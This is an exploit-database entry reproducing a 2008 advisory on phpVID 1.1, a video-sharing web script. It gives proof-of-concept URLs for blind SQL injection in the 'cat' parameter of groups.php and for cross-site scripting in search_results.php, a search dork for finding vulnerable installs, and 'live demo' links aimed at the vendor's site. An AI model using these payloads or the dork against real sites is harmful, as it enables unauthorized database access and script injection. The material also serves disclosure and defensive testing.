header-logo
Suggest Exploit
vendor:
phpVID
by:
r45c4l
8.8
CVSS
HIGH
Blind SQL Injection, Cross Site Scripting
89, 79
CWE
Product Name: phpVID
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2007

phpVID 1.1 The video sharing script! Multiple Vulnerabilities

The phpVID 1.1 The video sharing script is vulnerable to Blind SQL Injection in the 'groups.php' in the 'cat' parameter and Cross Site Scripting in 'search_results.php'. The POC for Blind SQL Injection is http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 and for Cross Site Scripting is http://www.site.com/search_results.php?query=[XSS]

Mitigation:

Input validation and sanitization should be done for all user inputs. Also, the application should be tested for SQL Injection and XSS vulnerabilities.
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE                #
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
#
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
# Vulnerable Version: 1.1
# 
###########################################################
#
# d0rk:Powered By Vastal I-Tech's phpVID. 
# 
# 
###########################################################
 
     Vulnerabilities

     Blind SQL Injection in "groups.php" in the "cat" parameter.
     Cross Site Scripting in "search_results.php"
  
     
     POC:  
	http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4 
	http://www.site.com/search_results.php?query=[XSS] 

     
     Live Demo: 
	http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
	http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>


###########################################################
#
#  Bug discovered : 10 Sep.2008
###########################################################

# milw0rm.com [2008-09-10]